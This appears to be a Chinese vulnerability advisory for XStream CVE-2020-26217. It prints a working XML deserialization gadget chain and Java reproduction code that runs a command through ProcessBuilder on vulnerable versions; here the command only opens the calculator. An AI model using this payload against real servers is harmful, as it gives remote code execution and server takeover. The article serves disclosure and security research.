漏洞描述
XStream是一个常用的Java对象和XML相互转换的工具。2020年11月16日,XStream官方发布安全更新,修复了 XStream远程代码执行漏洞( CVE-2020-26217)。攻击者通过构造恶意的XML文档,可绕过XStream的黑名单,触发反序列化,从而造成远程代码执行,控制服务器。
CVE编号
CVE-2020-26217
CVSS评分/漏洞等级
8.5/高危
影响版本
XStream < 1.4.14
漏洞POC
官网已经公布POC,参考地址:http://x-stream.github.io/CVE-2020-26217.html
<map><entry><jdk.nashorn.internal.objects.NativeString><flags>0</flags><value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'><dataHandler><dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'><contentType>text/plain</contentType><is class='java.io.SequenceInputStream'><e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'><iterator class='javax.imageio.spi.FilterIterator'><iter class='java.util.ArrayList$Itr'><cursor>0</cursor><lastRet>-1</lastRet><expectedModCount>1</expectedModCount><outer-class><java.lang.ProcessBuilder><command><string>calc</string></command></java.lang.ProcessBuilder></outer-class></iter><filter class='javax.imageio.ImageIO$ContainsFilter'><method><class>java.lang.ProcessBuilder</class><name>start</name><parameter-types/></method><name>start</name></filter><next/></iterator><type>KEYS</type></e><in class='java.io.ByteArrayInputStream'><buf></buf><pos>0</pos><mark>0</mark><count>0</count></in></is><consumed>false</consumed></dataSource><transferFlavors/></dataHandler><dataLen>0</dataLen></value></jdk.nashorn.internal.objects.NativeString><string>test</string></entry></map>
漏洞复现
-
IDE使用maven创建项目,在pom.xml中添加如下依赖:
<dependency><groupId>com.thoughtworks.xstream</groupId><artifactId>xstream</artifactId><version>1.4.13</version></dependency>
然后重载项目会自动下载安装对应版本的xstream
-
创建如下poc代码:
import com.thoughtworks.xstream.XStream;import java.io.IOException;public class CVE_2020_26217{public static void main(String[] args) throws IOException{XStream xStream = new XStream();String payload = "<map>n" +" <entry>n" +" <jdk.nashorn.internal.objects.NativeString>n" +" <flags>0</flags>n" +" <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>n" +" <dataHandler>n" +" <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>n" +" <contentType>text/plain</contentType>n" +" <is class='java.io.SequenceInputStream'>n" +" <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>n" +" <iterator class='javax.imageio.spi.FilterIterator'>n" +" <iter class='java.util.ArrayList$Itr'>n" +" <cursor>0</cursor>n" +" <lastRet>-1</lastRet>n" +" <expectedModCount>1</expectedModCount>n" +" <outer-class>n" +" <java.lang.ProcessBuilder>n" +" <command>n" +" <string>open</string>n" +" <string>-a</string>n" +" <string>Calculator</string>n" +" </command>n" +" </java.lang.ProcessBuilder>n" +" </outer-class>n" +" </iter>n" +" <filter class='javax.imageio.ImageIO$ContainsFilter'>n" +" <method>n" +" <class>java.lang.ProcessBuilder</class>n" +" <name>start</name>n" +" <parameter-types/>n" +" </method>n" +" <name>start</name>n" +" </filter>n" +" <next/>n" +" </iterator>n" +" <type>KEYS</type>n" +" </e>n" +" <in class='java.io.ByteArrayInputStream'>n" +" <buf></buf>n" +" <pos>0</pos>n" +" <mark>0</mark>n" +" <count>0</count>n" +" </in>n" +" </is>n" +" <consumed>false</consumed>n" +" </dataSource>n" +" <transferFlavors/>n" +" </dataHandler>n" +" <dataLen>0</dataLen>n" +" </value>n" +" </jdk.nashorn.internal.objects.NativeString>n" +" <string>test</string>n" +" </entry>n" +"</map>n";xStream.fromXML(payload);}}
编译运行
本文始发于微信公众号(锋刃科技):XStream 远程代码执行高危漏洞(CVE-2020-26217)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论